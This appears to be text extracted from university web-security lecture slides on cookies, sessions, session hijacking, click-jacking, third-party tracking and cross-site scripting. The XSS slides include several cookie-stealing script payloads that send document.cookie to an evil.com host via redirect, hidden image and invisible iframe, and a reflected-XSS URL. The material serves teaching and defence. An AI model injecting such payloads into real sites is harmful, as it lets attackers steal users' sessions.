<INPUT TYPE=” i npu t ” NAME=” he i gh t ” VALUE=”170cm”>
<INPUT TYPE=” i npu t ” NAME=”we ight ” VALUE=”53kg”>
![Page 63: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/63.jpg)
cookie✞ ☎
”name”=” A l i c e ”” he i gh t ”=”170cm””we ight ”=”53kg”e x p i r e =10 Dec , 2012
domain=. v i c t o r i a s s e c r e t . com
path : /send f o r : any type✝ ✆
![Page 64: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/64.jpg)
cookie✞ ☎”name”=” A l i c e ”” he i gh t ”=”170cm””we ight ”=”53kg”e x p i r e =10 Dec , 2012domain=. v i c t o r i a s s e c r e t . compath : /send f o r : any type✝ ✆
![Page 65: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/65.jpg)
cookie✞ ☎”name”=” A l i c e ”” he i gh t ”=”170cm””we ight ”=”53kg”e x p i r e =10 Dec , 2012domain=. v i c t o r i a s s e c r e t . compath : /send f o r : any type✝ ✆
cookie✞ ☎
”name”=” A l i c e ”” he i gh t ”=”170cm””we ight ”=”53kg”e x p i r e =10 Dec , 2012
domain=. v i c t o r i a s s e c r e t . com
path : /send f o r : any type✝ ✆
![Page 66: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/66.jpg)
Sessions Using Cookies — Cookie Properties
Expiration date : none specified, the cookie is deleted whenthe user exits the browser.
Domain name — the site for which this cookie is valid:
Only hosts within a domain can set a cookie for that domain.,A subdomain can set a cookie for a domain at most one levelup.A subdomain can access a cookie for the top-level domain.A host cannot set cookies for the TLDs.
Dynamic Content 29/79
![Page 67: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/67.jpg)
Cookie Domains
![Page 72: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/72.jpg)
Cookie Transport
Cookies, by default, are sent using HTTP.
MITM attacks!
Countermeasures:1 Set the secure flag: HTTPS is used instead.2 Encrypt the cookie value.3 Obfuscate the cookie name.
Dynamic Content 31/79
![Page 73: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/73.jpg)
Server-Side Sessions
User information is kept in a database on the server.
A session ID ( session token ) identifies the user’s session.
GET/POST variables or cookies are used to store the token onthe client.
When the user browses to a page, the token is sent to theserver, and the user’s data is looked up from the database.
✞ ☎
<HTML><BODY><FORM ACTION=” ht tp ://www. v i c t o r i a s s e c r e t . com/buy . j s p ”
METHOD=” get ”><INPUT TYPE=” h idden ” NAME=” s e s s i o n ID ” VALUE=”0x324A . . . ”></FORM></BODY></HTML>✝ ✆
Dynamic Content 32/79
![Page 74: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/74.jpg)
Server-Side Sessions
sessionID data
0x878. . . name="Alice",height="170cm",..
0x9A5. . . name="Bob",height="180cm",...
![Page 75: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/75.jpg)
Server-Side Sessions
sessionID data
0x878. . . name="Alice",height="170cm",..
0x9A5. . . name="Bob",height="180cm",...
sessionID=0x878...
The session ID should be hard to guess.
Dynamic Content 33/79
![Page 76: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/76.jpg)
Outline
1 Introduction2 HTTPS3 Dynamic Content
DOM TreeSessions and Cookies
4 Attacks on ClientsSession HijackingClick-JackingPrivacy AttacksXSSCSRF
5 Attacks on ServersPHPFile InclusionSQL Injection Attacks
6 Summary
Attacks on Clients 34/79
![Page 77: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/77.jpg)
Session Hijacking
TCP session hijacking can be used to take over an HTTPsession.
Attacks on Clients 35/79
![Page 78: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/78.jpg)
Session Hijacking
TCP session hijacking can be used to take over an HTTPsession.
The attacker needs to impersonate the session mechanism(cookies,POST/GET,session ID).
Attacks on Clients 35/79
![Page 79: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/79.jpg)
Session Hijacking
TCP session hijacking can be used to take over an HTTPsession.
The attacker needs to impersonate the session mechanism(cookies,POST/GET,session ID).
Packet sniffers can be used to discover session IDs/cookies.
Attacks on Clients 35/79
![Page 80: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/80.jpg)
Session Hijacking
TCP session hijacking can be used to take over an HTTPsession.
The attacker needs to impersonate the session mechanism(cookies,POST/GET,session ID).
Packet sniffers can be used to discover session IDs/cookies.
Replay attacks : an attacker uses an old (previously valid)token to attempt an HTTP session hijacking attack.
Attacks on Clients 35/79
![Page 81: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/81.jpg)
Session Hijacking
Alice
sessionID data
0x878. . . name="Alice"
height="170cm"
0x9A5. . . name="Bob"
height="180cm"
![Page 82: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/82.jpg)
Session Hijacking
Alice
sessionID data
0x878. . . name="Alice"
height="170cm"
0x9A5. . . name="Bob"
height="180cm"
sessionID=0x878...
![Page 83: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/83.jpg)
Session Hijacking
Alice
sessionID data
0x878. . . name="Alice"
height="170cm"
0x9A5. . . name="Bob"
height="180cm"
Eve
sessionID=0x878...
sessionID=0x878...
Attacks on Clients 36/79
![Page 84: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/84.jpg)
Session Hijacking — Countermeasures
1 Client-side session tokens need to be encrypted.
Attacks on Clients 37/79
![Page 85: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/85.jpg)
Session Hijacking — Countermeasures
1 Client-side session tokens need to be encrypted.
2 Server-side session IDs need to be random.
Attacks on Clients 37/79
![Page 86: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/86.jpg)
Session Hijacking — Countermeasures
1 Client-side session tokens need to be encrypted.
2 Server-side session IDs need to be random.
3 To protect against replay attacks:
Attacks on Clients 37/79
![Page 87: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/87.jpg)
Session Hijacking — Countermeasures
1 Client-side session tokens need to be encrypted.
2 Server-side session IDs need to be random.
3 To protect against replay attacks:
1 add random numbers to client-side/server-side tokens,
Attacks on Clients 37/79
![Page 88: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/88.jpg)
Session Hijacking — Countermeasures
1 Client-side session tokens need to be encrypted.
2 Server-side session IDs need to be random.
3 To protect against replay attacks:
1 add random numbers to client-side/server-side tokens,2 change session tokens frequently.
Attacks on Clients 37/79
![Page 89: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/89.jpg)
Click-Jacking
Clicking on a link takes you to the wrong site:✞ ☎
<a onMouseUp=window . open ( ” h t tp ://www. e v i l . com” )h r e f=” h t tp ://www. t r u s t e d . com”>Trust Me!</a>
✝ ✆
Click-fraud : Increasing the click-throughs to increaseadvertising revenue.
Attacks on Clients 38/79
![Page 90: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/90.jpg)
Click-Jacking
<a
www.trusted.comTrust Me!
href="http://www.trusted.com">Trust Me!</a>
Attacks on Clients 39/79
![Page 91: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/91.jpg)
Click-Jacking
href="http://www.trusted.com">Trust Me!</a>
www.evil.com
Trust Me!
<a onMouseUp=window.open("http://www.evil.com")
Attacks on Clients 39/79
![Page 92: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/92.jpg)
Privacy Attacks — Third-party cookies
1 You browse to http://www.example1.com:✞ ☎
<HTML><BODY><img s r c=” ht tp :// ads . e v i l . com”>
</BODY></HTML>✝ ✆
2 ads.evil.com sets a third-party cookie on your machine!
3 You browse to http://www.example2.com:✞ ☎
<HTML><BODY><img s r c=” ht tp :// ads . e v i l . com”>
</BODY></HTML>✝ ✆
4 ads.evil.com sets a third-party cookie on your machine!
5 You browse to http://www.ads.evil.com, it reads your cookies, andgets your browsing history!
Attacks on Clients 40/79
![Page 93: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/93.jpg)
Privacy Attacks — Third-party cookies
www.example1.com
Cookies
Attacks on Clients 41/79
![Page 94: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/94.jpg)
Privacy Attacks — Third-party cookies
Cookies
<HTML><BODY> <img src="http://ads.evil.com"></BODY></HTML>
www.evil.com
www.example1.com
Attacks on Clients 41/79
![Page 95: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/95.jpg)
Privacy Attacks — Third-party cookies
Cookies
<HTML><BODY> <img src="http://ads.evil.com"></BODY></HTML>
site=example1.com
www.evil.com
www.example1.com
Attacks on Clients 41/79
![Page 96: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/96.jpg)
Privacy Attacks — Third-party cookies
www.example2.com
<HTML><BODY> <img src="http://ads.evil.com"></BODY></HTML>
site=example1.com
site=example2.com
www.evil.com
Cookies
Attacks on Clients 41/79
![Page 97: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/97.jpg)
Privacy Attacks — Third-party cookies
Cookies
www.evil.com
site=example1.com
site=example2.com
Attacks on Clients 41/79
![Page 98: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/98.jpg)
Privacy Attacks — Third-party cookies
Browsing history!!!
www.evil.com
site=example1.com
site=example2.com
site=example1.com
site=example2.com
Cookies
Attacks on Clients 41/79
![Page 99: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/99.jpg)
Cross-Site Scripting (XSS)
Idea:1 attacker injects code C into a web site,
Attacks on Clients 42/79
![Page 100: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/100.jpg)
Cross-Site Scripting (XSS)
Idea:1 attacker injects code C into a web site,2 C makes its way into generated web page P ,
Attacks on Clients 42/79
![Page 101: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/101.jpg)
Cross-Site Scripting (XSS)
Idea:1 attacker injects code C into a web site,2 C makes its way into generated web page P ,3 a user is served the P page,
Attacks on Clients 42/79
![Page 102: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/102.jpg)
Cross-Site Scripting (XSS)
Idea:1 attacker injects code C into a web site,2 C makes its way into generated web page P ,3 a user is served the P page,4 the injected code C is executed on the user’s site.
Attacks on Clients 42/79
![Page 103: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/103.jpg)
Cross-Site Scripting (XSS)
Idea:1 attacker injects code C into a web site,2 C makes its way into generated web page P ,3 a user is served the P page,4 the injected code C is executed on the user’s site.
Attacks on Clients 42/79
![Page 104: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/104.jpg)
Cross-Site Scripting (XSS)
Idea:1 attacker injects code C into a web site,2 C makes its way into generated web page P ,3 a user is served the P page,4 the injected code C is executed on the user’s site.
Why does this work? The web programmer forgets to check( sanitize) input values!
Attacks on Clients 42/79
![Page 105: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/105.jpg)
Cross-Site Scripting (XSS)
www.site.com
Database
Attacks on Clients 43/79
![Page 106: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/106.jpg)
Cross-Site Scripting (XSS)
<INPUT TYPE="text" ...>
www.site.com
Database
Attacks on Clients 43/79
![Page 107: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/107.jpg)
Cross-Site Scripting (XSS)
<script>...</script>
www.site.com
<script>...</script>
Database
Attacks on Clients 43/79
![Page 108: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/108.jpg)
Cross-Site Scripting (XSS)
Database
www.site.com
<script>...</script>
Attacks on Clients 43/79
![Page 109: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/109.jpg)
Cross-Site Scripting (XSS)
<script>...</script>
www.site.com
<script>...</script>
Database
Attacks on Clients 43/79
![Page 110: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/110.jpg)
Cross-Site Scripting (XSS)
Sanitize input!
www.site.com
<script>...</script>
Database
<script>...</script>
<script>...</script>
<INPUT TYPE="text" ...>
Attacks on Clients 43/79
![Page 111: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/111.jpg)
Cross-Site Scripting. . .
Bob’s server sends Alice this form:✞ ☎
<HTML><TITLE>S ign My Guestbook !</TITLE>
<BODY><FORM ACTION=” s i g n . php” METHOD=”POST”>
<INPUT TYPE=” t e x t ” NAME=”name”><INPUT TYPE=” t e x t ” NAME=”message ” s i z e=”40”><INPUT TYPE=” submit ” VALUE=”Submit”>
</FORM></BODY></HTML>✝ ✆
Attacks on Clients 44/79
![Page 112: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/112.jpg)
Cross-Site Scripting. . .
Alice adds the text "I loved your new site!", andreturns it to Bob’s site.
In return, Bob sends her a new page:✞ ☎
<HTML><TITLE>S ign My Guestbook !</TITLE>
<BODY>Thanks eve rybody f o r your i n p u t !<br>Eve : I s a t beh ind you i n 7 th grade ! C a l l me! < br>Joe : Yo , f r a t−bro , l e t ’ s grab some b r ewsk i e s ! < br>A l i c e : I l o v ed your new s i t e !<br>
</BODY></HTML>✝ ✆
Attacks on Clients 45/79
![Page 113: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/113.jpg)
Cross-Site Scripting. . .
What if Eve had instead added the text✞ ☎
<s c r i p t >a l e r t ( ” A l i c e su ck s ! ” );</ s c r i p t >✝ ✆
as her comment?
Then Alice would be executing this page:✞ ☎
<HTML><TITLE>S ign My Guestbook !</TITLE>
<BODY>Thanks eve rybody f o r your i n p u t !<br>Eve : < s c r i p t >a l e r t ( ” A l i c e su ck s ! ” );</ s c r i p t > <br>Joe : Yo , f r a t−bro , l e t ’ s grab some b r ewsk i e s ! < br>A l i c e : I l o v ed your new s i t e !
</BODY></HTML>✝ ✆
Attacks on Clients 46/79
![Page 114: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/114.jpg)
Cross-Site Scripting. . .
Obviously, Eve could insert more harmful code:✞ ☎
<s c r i p t >document . l o c a t i o n =
” h t tp ://www. e v i l . com/ s t e a l . php? cook i e=”+document . c ook i e ;
</ s c r i p t >✝ ✆
This redirects the browser to the evil site, and passes alongAlice’s cookies.
Alice would notice that she’s being redirected to a weird site!
Attacks on Clients 47/79
![Page 115: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/115.jpg)
Cross-Site Scripting. . .
Eve could be more cunning:✞ ☎
<s c r i p t >img = new Image ( ) ;img . s r c=” h t tp ://www. e v i l . com/ s t e a l . php? cook i e=”+
document . c ook i e ;</ s c r i p t >✝ ✆
The browser tries to load an image from the evil site, passingalong the cookie.
No image is displayed — Alice doesn’t get suspicious!
Attacks on Clients 48/79
![Page 116: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/116.jpg)
Cross-Site Scripting. . .
An iframe is used to create a web page within a web page:✞ ☎
< i f r ame f rameborde r =0 s r c=”” h e i gh t=0width=0 i d=”XSS” name=”XSS”>
</i f r ame><s c r i p t >
f rames [ ”XSS” ] . l o c a t i o n . h r e f =” h t tp ://www. e v i l . com/ s t e a l . php? cook i e=”+document . c ook i e ;
</ s c r i p t >✝ ✆
This creates an invisible iframe, adding it to the DOM.
The script changes the source of the iframe to the evil site.
Attacks on Clients 49/79
![Page 117: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/117.jpg)
Cross-Site Scripting — Nonpersistent
So far, we’ve seen persistent XSS attacks:
the code Eve injects gets added to the server’s database;the code is displayed on the web page.
Non-persistent XSS attack: the injected code only persistsover the attacker’s session.
Example:1 attacker searches for "sneezing panda",2 web site responds with
"search results for ’sneezing panda’=..."
Attacks on Clients 50/79
![Page 118: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/118.jpg)
Cross-Site Scripting — Nonpersistent. . .
Assume a search page where the query is passed as a GETparameter:✞ ☎
h t tp : // v i c t im . com/ s e a r c h . php? query=s e a r c h s t r i n g✝ ✆
The attacker constructs this URL:✞ ☎
h t tp : // v i c t im . com/ s e a r c h . php? query=<s c r i p t >
document . l o c a t i o n=” h t tp :// e v i l . com/ s t e a l . php? cook i e=”+document . c ook i e
</ s c r i p t >✝ ✆
When the victim navigates to the URL, the payload will beexecuted in their browser.
Attacks on Clients 51/79
![Page 119: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/119.jpg)
Cross-Site Scripting (XSS) — Nonpersistent
www.site.comhttp://site.com/search.php?query=panda
Attacks on Clients 52/79
![Page 120: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/120.jpg)
Cross-Site Scripting (XSS) — Nonpersistent
http://site.com/search.php?query=pandawww.site.com
Attacks on Clients 52/79
![Page 121: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/121.jpg)
Cross-Site Scripting (XSS) — Nonpersistent
Click!
www.site.com
<a href="http://site.com/search.php?query=panda">See cute pandas here!!!
</a>
www.pandas.com
Attacks on Clients 52/79
![Page 122: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/122.jpg)
Cross-Site Scripting (XSS) — Nonpersistent
Click!
www.site.com
<a href="http://site.com/search.php?query=panda">See cute pandas here!!!
</a>
www.pandas.com
Attacks on Clients 52/79
![Page 123: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/123.jpg)
Cross-Site Scripting (XSS) — Nonpersistent
Search results for "panda" is ...
www.site.com
<a href="http://site.com/search.php?query=panda">See cute pandas here!!!
</a>
www.pandas.com
Click!
Attacks on Clients 52/79
